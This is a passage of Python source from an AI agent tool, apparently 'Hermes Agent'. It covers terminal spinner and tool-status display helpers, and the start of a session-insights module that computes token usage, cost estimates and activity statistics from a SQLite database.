should_flush = (now - self._last_flush_time) >= 0.4
self._write(f"\r{line}{' ' * pad}", end='', flush=should_flush)
if should_flush:
self._last_flush_time = now
self.last_line_len = len(line)
self.frame_idx += 1
time.sleep(0.12)
def start(self):
if self.running:
return
self.running = True
self.start_time = time.time()
self.thread = threading.Thread(target=self._animate, daemon=True)
self.thread.start()
def update_text(self, new_message: str):
self.message = new_message
def print_above(self, text: str):
"""Print a line above the spinner without disrupting animation.
Clears the current spinner line, prints the text, and lets the
next animation tick redraw the spinner on the line below.
Thread-safe: uses the captured stdout reference (self._out).
Works inside redirect_stdout(devnull) because _write bypasses
sys.stdout and writes to the stdout captured at spinner creation.
"""
if not self.running:
self._write(f" {text}", flush=True)
return
# Clear spinner line with spaces (not \033[K) to avoid garbled escape
# codes when prompt_toolkit's patch_stdout is active — same approach
# as stop(). Then print text; spinner redraws on next tick.
blanks = ' ' * max(self.last_line_len + 5, 40)
self._write(f"\r{blanks}\r {text}", flush=True)
def stop(self, final_message: str = None):
self.running = False
if self.thread:
self.thread.join(timeout=0.5)
# Clear the spinner line with spaces instead of \033[K to avoid
# garbled escape codes when prompt_toolkit's patch_stdout is active.
blanks = ' ' * max(self.last_line_len + 5, 40)
self._write(f"\r{blanks}\r", end='', flush=True)
if final_message:
self._write(f" {final_message}", flush=True)
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
return False
# =========================================================================
# Kawaii face arrays (used by AIAgent._execute_tool_calls for spinner text)
# =========================================================================
KAWAII_SEARCH = [
"♪(´ε` )", "(。◕‿◕。)", "ヾ(^∇^)", "(◕ᴗ◕✿)", "( ˘▽˘)っ",
"٩(◕‿◕。)۶", "(✿◠‿◠)", "♪~(´ε` )", "(ノ´ヮ`)*:・゚✧", "(◎o◎)",
]
KAWAII_READ = [
"φ(゜▽゜*)♪", "( ˘▽˘)っ", "(⌐■_■)", "٩(。•́‿•̀。)۶", "(◕‿◕✿)",
"ヾ(@⌒ー⌒@)", "(✧ω✧)", "♪(๑ᴖ◡ᴖ๑)♪", "(≧◡≦)", "( ´ ▽ ` )",
]
KAWAII_TERMINAL = [
"ヽ(>∀<☆)", "(ノ°∀°)", "٩(^ᴗ^)۶", "ヾ(⌐■_■)ノ♪", "(•̀ᴗ•́)و",
"┗(0)┓", "(`・ω・´)", "( ̄▽ ̄)", "(ง •̀_•́)ง", "ヽ(´▽`)/",
]
KAWAII_BROWSER = [
"(ノ°∀°)", "(☞゚ヮ゚)☞", "( ͡° ͜ʖ ͡°)", "┌( ಠ_ಠ)┘", "(⊙_⊙)",
"ヾ(•ω•`)o", "( ̄ω ̄)", "( ˇωˇ )", "(ᵔᴥᵔ)", "(◎o◎)",
]
KAWAII_CREATE = [
"✧*。٩(ˊᗜˋ*)و✧", "(ノ◕ヮ◕)ノ*:・゚✧", "ヽ(>∀<☆)", "٩(♡ε♡)۶", "(◕‿◕)♡",
"✿◕ ‿ ◕✿", "(*≧▽≦)", "ヾ(-)", "(☆▽☆)", "°˖✧◝(⁰▿⁰)◜✧˖°",
]
KAWAII_SKILL = [
"ヾ(@⌒ー⌒@)", "(๑˃ᴗ˂)ﻭ", "٩(◕‿◕。)۶", "(✿╹◡╹)", "ヽ(・∀・)",
"(ノ´ヮ`)*:・゚✧", "♪(๑ᴖ◡ᴖ๑)♪", "(◠‿◠)", "٩(ˊᗜˋ*)و", "(^▽^)",
"ヾ(^∇^)", "(★ω★)/", "٩(。•́‿•̀。)۶", "(◕ᴗ◕✿)", "(◎o◎)",
"(✧ω✧)", "ヽ(>∀<☆)", "( ˘▽˘)っ", "(≧◡≦) ♡", "ヾ( ̄▽ ̄)",
]
KAWAII_THINK = [
"(っ°Д°;)っ", "(;′⌒`)", "(・_・ヾ", "( ´_ゝ`)", "( ̄ヘ ̄)",
"(。-`ω´-)", "( ˘︹˘ )", "(¬_¬)", "ヽ(ー_ー )", "(一_一)",
]
KAWAII_GENERIC = [
"♪(´ε` )", "(◕‿◕✿)", "ヾ(^∇^)", "٩(◕‿◕。)۶", "(✿◠‿◠)",
"(ノ´ヮ`)*:・゚✧", "ヽ(>∀<☆)", "(☆▽☆)", "( ˘▽˘)っ", "(≧◡≦)",
]
# =========================================================================
# Cute tool message (completion line that replaces the spinner)
# =========================================================================
def _detect_tool_failure(tool_name: str, result: str | None) -> tuple[bool, str]:
"""Inspect a tool result string for signs of failure.
Returns ``(is_failure, suffix)`` where *suffix* is an informational tag
like ``" [exit 1]"`` for terminal failures, or ``" [error]"`` for generic
failures. On success, returns ``(False, "")``.
"""
if result is None:
return False, ""
if tool_name == "terminal":
try:
data = json.loads(result)
exit_code = data.get("exit_code")
if exit_code is not None and exit_code != 0:
return True, f" [exit {exit_code}]"
except (json.JSONDecodeError, TypeError, AttributeError):
logger.debug("Could not parse terminal result as JSON for exit code check")
return False, ""
# Memory-specific: distinguish "full" from real errors
if tool_name == "memory":
try:
data = json.loads(result)
if data.get("success") is False and "exceed the limit" in data.get("error", ""):
return True, " [full]"
except (json.JSONDecodeError, TypeError, AttributeError):
logger.debug("Could not parse memory result as JSON for capacity check")
# Generic heuristic for non-terminal tools
lower = result[:500].lower()
if '"error"' in lower or '"failed"' in lower or result.startswith("Error"):
return True, " [error]"
return False, ""
def get_cute_tool_message(
tool_name: str, args: dict, duration: float, result: str | None = None,
) -> str:
"""Generate a formatted tool completion line for CLI quiet mode.
Format: ``| {emoji} {verb:9} {detail} {duration}``
When *result* is provided the line is checked for failure indicators.
Failed tool calls get a red prefix and an informational suffix.
"""
dur = f"{duration:.1f}s"
is_failure, failure_suffix = _detect_tool_failure(tool_name, result)
skin_prefix = get_skin_tool_prefix()
def _trunc(s, n=40):
s = str(s)
return (s[:n-3] + "...") if len(s) > n else s
def _path(p, n=35):
p = str(p)
return ("..." + p[-(n-3):]) if len(p) > n else p
def _wrap(line: str) -> str:
"""Apply skin tool prefix and failure suffix."""
if skin_prefix != "":
line = line.replace("", skin_prefix, 1)
if not is_failure:
return line
return f"{line}{failure_suffix}"
if tool_name == "web_search":
return _wrap(f"┊ 🔍 search {_trunc(args.get('query', ''), 42)} {dur}")
if tool_name == "web_extract":
urls = args.get("urls", [])
if urls:
url = urls[0] if isinstance(urls, list) else str(urls)
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
extra = f" +{len(urls)-1}" if len(urls) > 1 else ""
return _wrap(f"┊ 📄 fetch {_trunc(domain, 35)}{extra} {dur}")
return _wrap(f"┊ 📄 fetch pages {dur}")
if tool_name == "web_crawl":
url = args.get("url", "")
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
return _wrap(f"┊ 🕸️ crawl {_trunc(domain, 35)} {dur}")
if tool_name == "terminal":
return _wrap(f"┊ 💻 $ {_trunc(args.get('command', ''), 42)} {dur}")
if tool_name == "process":
action = args.get("action", "?")
sid = args.get("session_id", "")[:12]
labels = {"list": "ls processes", "poll": f"poll {sid}", "log": f"log {sid}",
"wait": f"wait {sid}", "kill": f"kill {sid}", "write": f"write {sid}", "submit": f"submit {sid}"}
return _wrap(f"┊ ⚙️ proc {labels.get(action, f'{action} {sid}')} {dur}")
if tool_name == "read_file":
return _wrap(f"┊ 📖 read {_path(args.get('path', ''))} {dur}")
if tool_name == "write_file":
return _wrap(f"┊ ✍️ write {_path(args.get('path', ''))} {dur}")
if tool_name == "patch":
return _wrap(f"┊ 🔧 patch {_path(args.get('path', ''))} {dur}")
if tool_name == "search_files":
pattern = _trunc(args.get("pattern", ""), 35)
target = args.get("target", "content")
verb = "find" if target == "files" else "grep"
return _wrap(f"┊ 🔎 {verb:9} {pattern} {dur}")
if tool_name == "browser_navigate":
url = args.get("url", "")
domain = url.replace("https://", "").replace("http://", "").split("/")[0]
return _wrap(f"┊ 🌐 navigate {_trunc(domain, 35)} {dur}")
if tool_name == "browser_snapshot":
mode = "full" if args.get("full") else "compact"
return _wrap(f"┊ 📸 snapshot {mode} {dur}")
if tool_name == "browser_click":
return _wrap(f"┊ 👆 click {args.get('ref', '?')} {dur}")
if tool_name == "browser_type":
return _wrap(f"┊ ⌨️ type \"{_trunc(args.get('text', ''), 30)}\" {dur}")
if tool_name == "browser_scroll":
d = args.get("direction", "down")
arrow = {"down": "", "up": "", "right": "", "left": ""}.get(d, "")
return _wrap(f"{arrow} scroll {d} {dur}")
if tool_name == "browser_back":
return _wrap(f"┊ ◀️ back {dur}")
if tool_name == "browser_press":
return _wrap(f"┊ ⌨️ press {args.get('key', '?')} {dur}")
if tool_name == "browser_close":
return _wrap(f"┊ 🚪 close browser {dur}")
if tool_name == "browser_get_images":
return _wrap(f"┊ 🖼️ images extracting {dur}")
if tool_name == "browser_vision":
return _wrap(f"┊ 👁️ vision analyzing page {dur}")
if tool_name == "todo":
todos_arg = args.get("todos")
merge = args.get("merge", False)
if todos_arg is None:
return _wrap(f"┊ 📋 plan reading tasks {dur}")
elif merge:
return _wrap(f"┊ 📋 plan update {len(todos_arg)} task(s) {dur}")
else:
return _wrap(f"┊ 📋 plan {len(todos_arg)} task(s) {dur}")
if tool_name == "session_search":
return _wrap(f"┊ 🔍 recall \"{_trunc(args.get('query', ''), 35)}\" {dur}")
if tool_name == "memory":
action = args.get("action", "?")
target = args.get("target", "")
if action == "add":
return _wrap(f"┊ 🧠 memory +{target}: \"{_trunc(args.get('content', ''), 30)}\" {dur}")
elif action == "replace":
return _wrap(f"┊ 🧠 memory ~{target}: \"{_trunc(args.get('old_text', ''), 20)}\" {dur}")
elif action == "remove":
return _wrap(f"┊ 🧠 memory -{target}: \"{_trunc(args.get('old_text', ''), 20)}\" {dur}")
return _wrap(f"┊ 🧠 memory {action} {dur}")
if tool_name == "skills_list":
return _wrap(f"┊ 📚 skills list {args.get('category', 'all')} {dur}")
if tool_name == "skill_view":
return _wrap(f"┊ 📚 skill {_trunc(args.get('name', ''), 30)} {dur}")
if tool_name == "image_generate":
return _wrap(f"┊ 🎨 create {_trunc(args.get('prompt', ''), 35)} {dur}")
if tool_name == "text_to_speech":
return _wrap(f"┊ 🔊 speak {_trunc(args.get('text', ''), 30)} {dur}")
if tool_name == "vision_analyze":
return _wrap(f"┊ 👁️ vision {_trunc(args.get('question', ''), 30)} {dur}")
if tool_name == "mixture_of_agents":
return _wrap(f"┊ 🧠 reason {_trunc(args.get('user_prompt', ''), 30)} {dur}")
if tool_name == "send_message":
return _wrap(f"┊ 📨 send {args.get('target', '?')}: \"{_trunc(args.get('message', ''), 25)}\" {dur}")
if tool_name == "schedule_cronjob":
return _wrap(f"┊ ⏰ schedule {_trunc(args.get('name', args.get('prompt', 'task')), 30)} {dur}")
if tool_name == "list_cronjobs":
return _wrap(f"┊ ⏰ jobs listing {dur}")
if tool_name == "remove_cronjob":
return _wrap(f"┊ ⏰ remove job {args.get('job_id', '?')} {dur}")
if tool_name.startswith("rl_"):
rl = {
"rl_list_environments": "list envs", "rl_select_environment": f"select {args.get('name', '')}",
"rl_get_current_config": "get config", "rl_edit_config": f"set {args.get('field', '?')}",
"rl_start_training": "start training", "rl_check_status": f"status {args.get('run_id', '?')[:12]}",
"rl_stop_training": f"stop {args.get('run_id', '?')[:12]}", "rl_get_results": f"results {args.get('run_id', '?')[:12]}",
"rl_list_runs": "list runs", "rl_test_inference": "test inference",
}
return _wrap(f"┊ 🧪 rl {rl.get(tool_name, tool_name.replace('rl_', ''))} {dur}")
if tool_name == "execute_code":
code = args.get("code", "")
first_line = code.strip().split("\n")[0] if code.strip() else ""
return _wrap(f"┊ 🐍 exec {_trunc(first_line, 35)} {dur}")
if tool_name == "delegate_task":
tasks = args.get("tasks")
if tasks and isinstance(tasks, list):
return _wrap(f"┊ 🔀 delegate {len(tasks)} parallel tasks {dur}")
return _wrap(f"┊ 🔀 delegate {_trunc(args.get('goal', ''), 35)} {dur}")
preview = build_tool_preview(tool_name, args) or ""
return _wrap(f"┊ ⚡ {tool_name[:9]:9} {_trunc(preview, 35)} {dur}")
# =========================================================================
# Honcho session line (one-liner with clickable OSC 8 hyperlink)
# =========================================================================
_DIM = "\033[2m"
_SKY_BLUE = "\033[38;5;117m"
_ANSI_RESET = "\033[0m"
def honcho_session_url(workspace: str, session_name: str) -> str:
"""Build a Honcho app URL for a session."""
from urllib.parse import quote
return (
f"https://app.honcho.dev/explore"
f"?workspace={quote(workspace, safe='')}"
f"&view=sessions"
f"&session={quote(session_name, safe='')}"
)
def _osc8_link(url: str, text: str) -> str:
"""OSC 8 terminal hyperlink (clickable in iTerm2, Ghostty, WezTerm, etc.)."""
return f"\033]8;;{url}\033\\{text}\033]8;;\033\\"
def honcho_session_line(workspace: str, session_name: str) -> str:
"""One-line session indicator: `Honcho session: <clickable name>`."""
url = honcho_session_url(workspace, session_name)
linked_name = _osc8_link(url, f"{_SKY_BLUE}{session_name}{_ANSI_RESET}")
return f"{_DIM}Honcho session:{_ANSI_RESET} {linked_name}"
def write_tty(text: str) -> None:
"""Write directly to /dev/tty, bypassing stdout capture."""
try:
fd = os.open("/dev/tty", os.O_WRONLY)
os.write(fd, text.encode("utf-8"))
os.close(fd)
except OSError:
sys.stdout.write(text)
sys.stdout.flush()

818
agent/insights.py Normal file
View File

@@ -0,0 +1,818 @@
"""
Session Insights Engine for Hermes Agent.
Analyzes historical session data from the SQLite state database to produce
comprehensive usage insights — token consumption, cost estimates, tool usage
patterns, activity trends, model/platform breakdowns, and session metrics.
Inspired by Claude Code's /insights command, adapted for Hermes Agent's
multi-platform architecture with additional cost estimation and platform
breakdown capabilities.
Usage:
from agent.insights import InsightsEngine
engine = InsightsEngine(db)
report = engine.generate(days=30)
print(engine.format_terminal(report))
"""
import json
import time
from collections import Counter, defaultdict
from datetime import datetime
from typing import Any, Dict, List, Optional
# =========================================================================
# Model pricing (USD per million tokens) — approximate as of early 2026
# =========================================================================
MODEL_PRICING = {
# OpenAI
"gpt-4o": {"input": 2.50, "output": 10.00},
"gpt-4o-mini": {"input": 0.15, "output": 0.60},
"gpt-4.1": {"input": 2.00, "output": 8.00},
"gpt-4.1-mini": {"input": 0.40, "output": 1.60},
"gpt-4.1-nano": {"input": 0.10, "output": 0.40},
"gpt-4.5-preview": {"input": 75.00, "output": 150.00},
"gpt-5": {"input": 10.00, "output": 30.00},
"gpt-5.4": {"input": 10.00, "output": 30.00},
"o3": {"input": 10.00, "output": 40.00},
"o3-mini": {"input": 1.10, "output": 4.40},
"o4-mini": {"input": 1.10, "output": 4.40},
# Anthropic
"claude-opus-4-20250514": {"input": 15.00, "output": 75.00},
"claude-sonnet-4-20250514": {"input": 3.00, "output": 15.00},
"claude-3-5-sonnet-20241022": {"input": 3.00, "output": 15.00},
"claude-3-5-haiku-20241022": {"input": 0.80, "output": 4.00},
"claude-3-opus-20240229": {"input": 15.00, "output": 75.00},
"claude-3-haiku-20240307": {"input": 0.25, "output": 1.25},
# DeepSeek
"deepseek-chat": {"input": 0.14, "output": 0.28},
"deepseek-reasoner": {"input": 0.55, "output": 2.19},
# Google
"gemini-2.5-pro": {"input": 1.25, "output": 10.00},
"gemini-2.5-flash": {"input": 0.15, "output": 0.60},
"gemini-2.0-flash": {"input": 0.10, "output": 0.40},
# Meta (via providers)
"llama-4-maverick": {"input": 0.50, "output": 0.70},
"llama-4-scout": {"input": 0.20, "output": 0.30},
# Z.AI / GLM (direct provider — pricing not published externally, treat as local)
"glm-5": {"input": 0.0, "output": 0.0},
"glm-4.7": {"input": 0.0, "output": 0.0},
"glm-4.5": {"input": 0.0, "output": 0.0},
"glm-4.5-flash": {"input": 0.0, "output": 0.0},
# Kimi / Moonshot (direct provider — pricing not published externally, treat as local)
"kimi-k2.5": {"input": 0.0, "output": 0.0},
"kimi-k2-thinking": {"input": 0.0, "output": 0.0},
"kimi-k2-turbo-preview": {"input": 0.0, "output": 0.0},
"kimi-k2-0905-preview": {"input": 0.0, "output": 0.0},
# MiniMax (direct provider — pricing not published externally, treat as local)
"MiniMax-M2.5": {"input": 0.0, "output": 0.0},
"MiniMax-M2.5-highspeed": {"input": 0.0, "output": 0.0},
"MiniMax-M2.1": {"input": 0.0, "output": 0.0},
}
# Fallback: unknown/custom models get zero cost (we can't assume pricing
# for self-hosted models, custom OAI endpoints, local inference, etc.)
_DEFAULT_PRICING = {"input": 0.0, "output": 0.0}
def _has_known_pricing(model_name: str) -> bool:
"""Check if a model has known pricing (vs unknown/custom endpoint)."""
return _get_pricing(model_name) is not _DEFAULT_PRICING
def _get_pricing(model_name: str) -> Dict[str, float]:
"""Look up pricing for a model. Uses fuzzy matching on model name.
Returns _DEFAULT_PRICING (zero cost) for unknown/custom models —
we can't assume costs for self-hosted endpoints, local inference, etc.
"""
if not model_name:
return _DEFAULT_PRICING
# Strip provider prefix (e.g., "anthropic/claude-..." -> "claude-...")
bare = model_name.split("/")[-1].lower()
# Exact match first
if bare in MODEL_PRICING:
return MODEL_PRICING[bare]
# Fuzzy prefix match — prefer the LONGEST matching key to avoid
# e.g. "gpt-4o" matching before "gpt-4o-mini" for "gpt-4o-mini-2024-07-18"
best_match = None
best_len = 0
for key, price in MODEL_PRICING.items():
if bare.startswith(key) and len(key) > best_len:
best_match = price
best_len = len(key)
if best_match:
return best_match
# Keyword heuristics (checked in most-specific-first order)
if "opus" in bare:
return {"input": 15.00, "output": 75.00}
if "sonnet" in bare:
return {"input": 3.00, "output": 15.00}
if "haiku" in bare:
return {"input": 0.80, "output": 4.00}
if "gpt-4o-mini" in bare:
return {"input": 0.15, "output": 0.60}
if "gpt-4o" in bare:
return {"input": 2.50, "output": 10.00}
if "gpt-5" in bare:
return {"input": 10.00, "output": 30.00}
if "deepseek" in bare:
return {"input": 0.14, "output": 0.28}
if "gemini" in bare:
return {"input": 0.15, "output": 0.60}
return _DEFAULT_PRICING
def _estimate_cost(model: str, input_tokens: int, output_tokens: int) -> float:
"""Estimate the USD cost for a given model and token counts."""
pricing = _get_pricing(model)
return (input_tokens * pricing["input"] + output_tokens * pricing["output"]) / 1_000_000
def _format_duration(seconds: float) -> str:
"""Format seconds into a human-readable duration string."""
if seconds < 60:
return f"{seconds:.0f}s"
minutes = seconds / 60
if minutes < 60:
return f"{minutes:.0f}m"
hours = minutes / 60
if hours < 24:
remaining_min = int(minutes % 60)
return f"{int(hours)}h {remaining_min}m" if remaining_min else f"{int(hours)}h"
days = hours / 24
return f"{days:.1f}d"
def _bar_chart(values: List[int], max_width: int = 20) -> List[str]:
"""Create simple horizontal bar chart strings from values."""
peak = max(values) if values else 1
if peak == 0:
return ["" for _ in values]
return ["" * max(1, int(v / peak * max_width)) if v > 0 else "" for v in values]
class InsightsEngine:
"""
Analyzes session history and produces usage insights.
Works directly with a SessionDB instance (or raw sqlite3 connection)
to query session and message data.
"""
def __init__(self, db):
"""
Initialize with a SessionDB instance.
Args:
db: A SessionDB instance (from hermes_state.py)
"""
self.db = db
self._conn = db._conn
def generate(self, days: int = 30, source: str = None) -> Dict[str, Any]:
"""
Generate a complete insights report.
Args:
days: Number of days to look back (default: 30)
source: Optional filter by source platform
Returns:
Dict with all computed insights
"""
cutoff = time.time() - (days * 86400)
# Gather raw data
sessions = self._get_sessions(cutoff, source)
tool_usage = self._get_tool_usage(cutoff, source)
message_stats = self._get_message_stats(cutoff, source)
if not sessions:
return {
"days": days,
"source_filter": source,
"empty": True,
"overview": {},
"models": [],
"platforms": [],
"tools": [],
"activity": {},
"top_sessions": [],
}
# Compute insights
overview = self._compute_overview(sessions, message_stats)
models = self._compute_model_breakdown(sessions)
platforms = self._compute_platform_breakdown(sessions)
tools = self._compute_tool_breakdown(tool_usage)
activity = self._compute_activity_patterns(sessions)
top_sessions = self._compute_top_sessions(sessions)
return {
"days": days,
"source_filter": source,
"empty": False,
"generated_at": time.time(),
"overview": overview,
"models": models,
"platforms": platforms,
"tools": tools,
"activity": activity,
"top_sessions": top_sessions,
}
# =========================================================================
# Data gathering (SQL queries)
# =========================================================================
# Columns we actually need (skip system_prompt, model_config blobs)
_SESSION_COLS = ("id, source, model, started_at, ended_at, "
"message_count, tool_call_count, input_tokens, output_tokens")
def _get_sessions(self, cutoff: float, source: str = None) -> List[Dict]:
"""Fetch sessions within the time window."""
if source:
cursor = self._conn.execute(
f"""SELECT {self._SESSION_COLS} FROM sessions
WHERE started_at >= ? AND source = ?
ORDER BY started_at DESC""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
f"""SELECT {self._SESSION_COLS} FROM sessions
WHERE started_at >= ?
ORDER BY started_at DESC""",
(cutoff,),
)
return [dict(row) for row in cursor.fetchall()]
def _get_tool_usage(self, cutoff: float, source: str = None) -> List[Dict]:
"""Get tool call counts from messages.
Uses two sources:
1. tool_name column on 'tool' role messages (set by gateway)
2. tool_calls JSON on 'assistant' role messages (covers CLI where
tool_name is not populated on tool responses)
"""
tool_counts = Counter()
# Source 1: explicit tool_name on tool response messages
if source:
cursor = self._conn.execute(
"""SELECT m.tool_name, COUNT(*) as count
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?
AND m.role = 'tool' AND m.tool_name IS NOT NULL
GROUP BY m.tool_name
ORDER BY count DESC""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
"""SELECT m.tool_name, COUNT(*) as count
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?
AND m.role = 'tool' AND m.tool_name IS NOT NULL
GROUP BY m.tool_name
ORDER BY count DESC""",
(cutoff,),
)
for row in cursor.fetchall():
tool_counts[row["tool_name"]] += row["count"]
# Source 2: extract from tool_calls JSON on assistant messages
# (covers CLI sessions where tool_name is NULL on tool responses)
if source:
cursor2 = self._conn.execute(
"""SELECT m.tool_calls
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?
AND m.role = 'assistant' AND m.tool_calls IS NOT NULL""",
(cutoff, source),
)
else:
cursor2 = self._conn.execute(
"""SELECT m.tool_calls
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?
AND m.role = 'assistant' AND m.tool_calls IS NOT NULL""",
(cutoff,),
)
tool_calls_counts = Counter()
for row in cursor2.fetchall():
try:
calls = row["tool_calls"]
if isinstance(calls, str):
calls = json.loads(calls)
if isinstance(calls, list):
for call in calls:
func = call.get("function", {}) if isinstance(call, dict) else {}
name = func.get("name")
if name:
tool_calls_counts[name] += 1
except (json.JSONDecodeError, TypeError, AttributeError):
continue
# Merge: prefer tool_name source, supplement with tool_calls source
# for tools not already counted
if not tool_counts and tool_calls_counts:
# No tool_name data at all — use tool_calls exclusively
tool_counts = tool_calls_counts
elif tool_counts and tool_calls_counts:
# Both sources have data — use whichever has the higher count per tool
# (they may overlap, so take the max to avoid double-counting)
all_tools = set(tool_counts) | set(tool_calls_counts)
merged = Counter()
for tool in all_tools:
merged[tool] = max(tool_counts.get(tool, 0), tool_calls_counts.get(tool, 0))
tool_counts = merged
# Convert to the expected format
return [
{"tool_name": name, "count": count}
for name, count in tool_counts.most_common()
]
def _get_message_stats(self, cutoff: float, source: str = None) -> Dict:
"""Get aggregate message statistics."""
if source:
cursor = self._conn.execute(
"""SELECT
COUNT(*) as total_messages,
SUM(CASE WHEN m.role = 'user' THEN 1 ELSE 0 END) as user_messages,
SUM(CASE WHEN m.role = 'assistant' THEN 1 ELSE 0 END) as assistant_messages,
SUM(CASE WHEN m.role = 'tool' THEN 1 ELSE 0 END) as tool_messages
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
"""SELECT
COUNT(*) as total_messages,
SUM(CASE WHEN m.role = 'user' THEN 1 ELSE 0 END) as user_messages,
SUM(CASE WHEN m.role = 'assistant' THEN 1 ELSE 0 END) as assistant_messages,
SUM(CASE WHEN m.role = 'tool' THEN 1 ELSE 0 END) as tool_messages
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?""",
(cutoff,),
)
row = cursor.fetchone()
return dict(row) if row else {
"total_messages": 0, "user_messages": 0,
"assistant_messages": 0, "tool_messages": 0,
}
# =========================================================================
# Computation
# =========================================================================
def _compute_overview(self, sessions: List[Dict], message_stats: Dict) -> Dict:
"""Compute high-level overview statistics."""
total_input = sum(s.get("input_tokens") or 0 for s in sessions)
total_output = sum(s.get("output_tokens") or 0 for s in sessions)
total_tokens = total_input + total_output
total_tool_calls = sum(s.get("tool_call_count") or 0 for s in sessions)
total_messages = sum(s.get("message_count") or 0 for s in sessions)
# Cost estimation (weighted by model)
total_cost = 0.0
models_with_pricing = set()
models_without_pricing = set()
for s in sessions:
model = s.get("model") or ""
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
total_cost += _estimate_cost(model, inp, out)
display = model.split("/")[-1] if "/" in model else (model or "unknown")
if _has_known_pricing(model):
models_with_pricing.add(display)
else:
models_without_pricing.add(display)
# Session duration stats (guard against negative durations from clock drift)
durations = []
for s in sessions:
start = s.get("started_at")
end = s.get("ended_at")
if start and end and end > start:
durations.append(end - start)
total_hours = sum(durations) / 3600 if durations else 0
avg_duration = sum(durations) / len(durations) if durations else 0
# Earliest and latest session
started_timestamps = [s["started_at"] for s in sessions if s.get("started_at")]
date_range_start = min(started_timestamps) if started_timestamps else None
date_range_end = max(started_timestamps) if started_timestamps else None
return {
"total_sessions": len(sessions),
"total_messages": total_messages,
"total_tool_calls": total_tool_calls,
"total_input_tokens": total_input,
"total_output_tokens": total_output,
"total_tokens": total_tokens,
"estimated_cost": total_cost,
"total_hours": total_hours,
"avg_session_duration": avg_duration,
"avg_messages_per_session": total_messages / len(sessions) if sessions else 0,
"avg_tokens_per_session": total_tokens / len(sessions) if sessions else 0,
"user_messages": message_stats.get("user_messages") or 0,
"assistant_messages": message_stats.get("assistant_messages") or 0,
"tool_messages": message_stats.get("tool_messages") or 0,
"date_range_start": date_range_start,
"date_range_end": date_range_end,
"models_with_pricing": sorted(models_with_pricing),
"models_without_pricing": sorted(models_without_pricing),
}
def _compute_model_breakdown(self, sessions: List[Dict]) -> List[Dict]:
"""Break down usage by model."""
model_data = defaultdict(lambda: {
"sessions": 0, "input_tokens": 0, "output_tokens": 0,
"total_tokens": 0, "tool_calls": 0, "cost": 0.0,
})
for s in sessions:
model = s.get("model") or "unknown"
# Normalize: strip provider prefix for display
display_model = model.split("/")[-1] if "/" in model else model
d = model_data[display_model]
d["sessions"] += 1
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
d["input_tokens"] += inp
d["output_tokens"] += out
d["total_tokens"] += inp + out
d["tool_calls"] += s.get("tool_call_count") or 0
d["cost"] += _estimate_cost(model, inp, out)
d["has_pricing"] = _has_known_pricing(model)
result = [
{"model": model, **data}
for model, data in model_data.items()
]
# Sort by tokens first, fall back to session count when tokens are 0
result.sort(key=lambda x: (x["total_tokens"], x["sessions"]), reverse=True)
return result
def _compute_platform_breakdown(self, sessions: List[Dict]) -> List[Dict]:
"""Break down usage by platform/source."""
platform_data = defaultdict(lambda: {
"sessions": 0, "messages": 0, "input_tokens": 0,
"output_tokens": 0, "total_tokens": 0, "tool_calls": 0,
})
for s in sessions:
source = s.get("source") or "unknown"
d = platform_data[source]
d["sessions"] += 1
d["messages"] += s.get("message_count") or 0
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
d["input_tokens"] += inp
d["output_tokens"] += out
d["total_tokens"] += inp + out
d["tool_calls"] += s.get("tool_call_count") or 0
result = [
{"platform": platform, **data}
for platform, data in platform_data.items()
]
result.sort(key=lambda x: x["sessions"], reverse=True)
return result
def _compute_tool_breakdown(self, tool_usage: List[Dict]) -> List[Dict]:
"""Process tool usage data into a ranked list with percentages."""
total_calls = sum(t["count"] for t in tool_usage) if tool_usage else 0
result = []
for t in tool_usage:
pct = (t["count"] / total_calls * 100) if total_calls else 0
result.append({
"tool": t["tool_name"],
"count": t["count"],
"percentage": pct,
})
return result
def _compute_activity_patterns(self, sessions: List[Dict]) -> Dict:
"""Analyze activity patterns by day of week and hour."""
day_counts = Counter() # 0=Monday ... 6=Sunday
hour_counts = Counter()
daily_counts = Counter() # date string -> count
for s in sessions:
ts = s.get("started_at")
if not ts:
continue
dt = datetime.fromtimestamp(ts)
day_counts[dt.weekday()] += 1
hour_counts[dt.hour] += 1
daily_counts[dt.strftime("%Y-%m-%d")] += 1
day_names = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
day_breakdown = [
{"day": day_names[i], "count": day_counts.get(i, 0)}
for i in range(7)
]
hour_breakdown = [
{"hour": i, "count": hour_counts.get(i, 0)}
for i in range(24)
]
# Busiest day and hour
busiest_day = max(day_breakdown, key=lambda x: x["count"]) if day_breakdown else None
busiest_hour = max(hour_breakdown, key=lambda x: x["count"]) if hour_breakdown else None
# Active days (days with at least one session)
active_days = len(daily_counts)
# Streak calculation
if daily_counts:
all_dates = sorted(daily_counts.keys())
current_streak = 1
max_streak = 1
for i in range(1, len(all_dates)):
d1 = datetime.strptime(all_dates[i - 1], "%Y-%m-%d")
d2 = datetime.strptime(all_dates[i], "%Y-%m-%d")
if (d2 - d1).days == 1:
current_streak += 1
max_streak = max(max_streak, current_streak)
else:
current_streak = 1
else:
max_streak = 0
return {
"by_day": day_breakdown,
"by_hour": hour_breakdown,
"busiest_day": busiest_day,
"busiest_hour": busiest_hour,
"active_days": active_days,
"max_streak": max_streak,
}
def _compute_top_sessions(self, sessions: List[Dict]) -> List[Dict]:
"""Find notable sessions (longest, most messages, most tokens)."""
top = []
# Longest by duration
sessions_with_duration = [
s for s in sessions
if s.get("started_at") and s.get("ended_at")
]
if sessions_with_duration:
longest = max(
sessions_with_duration,
key=lambda s: (s["ended_at"] - s["started_at"]),
)
dur = longest["ended_at"] - longest["started_at"]
top.append({
